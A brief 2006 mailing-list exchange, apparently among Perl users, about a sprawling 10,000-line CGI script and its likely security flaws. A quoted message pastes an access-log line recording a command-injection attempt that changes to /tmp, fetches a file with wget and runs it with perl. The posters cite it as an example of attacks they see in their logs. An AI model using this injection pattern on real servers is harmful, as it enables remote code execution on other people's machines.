Aaron Trevena aaron.trevena at
Wed Mar 8 09:38:01 GMT 2006

On 08/03/06, Jonathan Stowe <jns at> wrote:
> On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> > A 10Kline CGI script, with most variables global and including its own CGI
> > parameter parsing.
> I'd say it has a widely known and exploitable flaw:
> access.log: - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/|echo%20;cd%20/tmp;wget%20http://;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo|

Yeah - I see that a lot in my logs, and that is most of the reason I
generate static html every night - that and it's a lot less work for my
poor little virtual server.

